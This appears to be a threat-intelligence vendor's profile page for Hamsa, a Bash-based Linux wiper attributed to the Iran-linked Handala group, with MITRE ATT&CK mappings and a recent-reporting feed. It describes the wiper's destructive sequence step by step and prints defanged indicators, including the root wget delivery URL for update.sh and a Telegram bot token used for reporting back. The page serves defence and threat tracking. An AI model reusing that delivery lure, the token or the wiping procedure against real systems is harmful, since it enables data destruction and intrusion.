MalwareUsed by 1 actor

Hamsa

Hamsa is a Linux wiper malware family, described as a Bash-based destructive payload used in cross-platform campaigns alongside the Windows wiper Hatef and, in some reporting, BiBi Wiper. It is associated with the Handala Hack Team / Handala persona, which multiple security vendors assess as linked to Iran’s MOIS and also track under related cluster names including Void Manticore, Storm-0842, BANISHED KITTEN, and Dune. Reporting places Hamsa in broader Handala disruptive operations targeting primarily Israeli organizations, with later expansion to U.S., Gulf, and Western targets.

Hamsa was specifically documented in the phishing campaign dubbed Operation HamsaUpdate, which targeted Israeli customers using F5 BIG-IP-themed lures. In that campaign, victims were instructed to run a root-privileged wget command that downloaded and executed an obfuscated script named update.sh. The Linux payload used five layers of Base64 with eval, delayed execution for 30 minutes, fingerprinted the Linux distribution, installed tools including xfsprogs, wipe, and parted, enumerated and deleted user accounts with UID greater than 999, wiped their home directories, unmounted non-root partitions, recreated GPT partition tables, created new partitions, formatted them as XFS, deleted system binaries under /bin, /sbin, /usr/bin, and /usr/sbin while preserving reboot and rm until late in execution, and then rebooted the system to render it inoperable. The malware also reported execution status via Telegram, using the same Bot ID and chat/channel ID observed in the paired Windows variant.

More generally, reporting describes Hamsa as part of a newer generation of Iranian-linked wipers that moved away from MBR destruction toward rapid recursive file destruction. In comparative reporting, Hamsa and BiBi are characterized as Bash-based Linux wipers targeting Linux servers, while Hatef is the .NET-based Windows counterpart. Mentioned infrastructure and IoCs tied to the HamsaUpdate activity include the delivery command using hxxps://sjc1.vultrobjects[.]com/f5update/update.sh, Telegram Bot ID 6428401585:AAGE6SbwtVJxOpLjdMcrL45gb18H9UV7tQA, and Channel/Chat ID 6932028002. High-confidence reporting also places Hamsa among Handala’s destructive malware set, which includes BiBi Wiper, Hatef, CoolWipe, ChillWipe, Cl Wiper, and Handala Wiper.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Handala

The group’s wiper malware family includes variants named BiBi Wiper, Hatef, Hamsa (Linux), CoolWipe, and ChillWipe.

via socradar blogsocradar.io

MITRE ATT&CK

Techniques & procedures

11 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

2 techniques

T1566.001Spearphishing AttachmentEvidence1

The most studied example is a phishing campaign from July 2024 that exploited the global CrowdStrike outage. The group sent emails to Israeli organizations with fake remediation tools. Victims who downloaded the archive got hit with a multi-stage chain that ended in a wiper payload erasing their files.

T1566.002Spearphishing LinkEvidence1

Victims were directed to download a malicious archive containing a disguised installer that deployed a destructive wiper payload.

Execution

1 technique

T1204User ExecutionEvidence1

“the victim is instructed to run a specific file across all their Linux and Windows servers… utilize root privileges to execute a wget command… Windows server administrators are instructed to open and execute an attached archive ZIP file.”

Privilege Escalation

1 technique

T1548Abuse Elevation Control MechanismEvidence1

“Hatef Wiper checks for Administrator privileges… presents a message box… requiring Administrator access to proceed… coax the user into granting elevated permissions.” / “For Linux servers… utilizing root privileges to execute a wget command.”

Stealth

2 techniques

T1027Obfuscated Files or InformationEvidence1

“obfuscated payload… concealed within… five Base64 encoding steps… executed using the ‘eval’ command.” / “loader conceals its strings with… ADD… AutoIt script… strings… SUB… shellcode… implements the RC4 stream cipher… decrypt another payload… decompressed… LZNT1.”

T1036MasqueradingEvidence1

“F5UPDATER.EXE… disguised as a system update tool of F5.” / “After masquerading as a routine update… ‘The system has been updated successfully!’” / “Naples.pif… renamed AutoIt interpreter… .pif… camouflage…”

Discovery

1 technique

T1082System Information DiscoveryEvidence1

“transmits… external IP address… hostname… timestamp…” / “reconnaissance to identify the Linux distribution… Red Hat, Ubuntu, or Debian.”

Command and Control

1 technique

T1102Web ServiceEvidence1

“During its operation, the wiper sends periodic updates to a predetermined Telegram chat…” / “this wiper version transmits data to the same Telegram channel… Bot Id… Channel Id…”

Impact

3 techniques

T1485Data DestructionEvidence4

MITRE ATT&CK TTPs Tactic ID Technique Impact T1485 Data Destruction

T1531Account Access RemovalEvidence1

“enumerates all user accounts with an ID number exceeding 999. It systematically eliminates these accounts and obliterates their associated files.”

T1561.002Disk Structure WipeEvidence2

MITRE ATT&CK TTPs Tactic ID Technique Impact T1561.002 Disk Structure Wipe

INDICATORS OF COMPROMISE

IOCs tracked for this family

5 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.

View more in app

Network

1 tracked

IPs, domains, and DNS infrastructure linked to this family.

Hashes

3 tracked

File hashes (MD5, SHA-1, SHA-256) from samples and reports.

Other

1 tracked

Other indicator types observed in public reporting.

TypeValueLatest sighting

domain●●●●●●●●●●●●View more in app3 years ago

hash.md5●●●●●●●●●●●●View more in app3 years ago

hash.sha256●●●●●●●●●●●●View more in app3 years ago

uri●●●●●●●●●●●●View more in app3 years ago

ACTIVITY FEED

Recent activity

5 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

5 SOURCESView more in app

socradar blogNews

Apr 28, 2026

Handala Hack Targets U.S. Troops with Doxxing Threats in Bahrain

A Linux wiper variant associated with Handala’s destructive malware family.

palo alto networks unit 42 blogNews

Mar 16, 2026

Iranian Cyber Threat Evolution: From MBR Wipers to Identity Weaponization

A Bash-based Linux wiper used in cross-platform destructive campaigns and focused on file-level destruction.

socradar blogNews

Mar 13, 2026

Dark Web Profile: Handala Hack

A Linux Bash-based destructive wiper used in Handala campaigns.

outpost24 blogNews

Jul 1, 2025

How hacktivist cyber operations surged amid Israeli-Iranian conflict

Linux wiper used by the Handala Hack Team in destructive operations.

+1 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching5

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping11

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.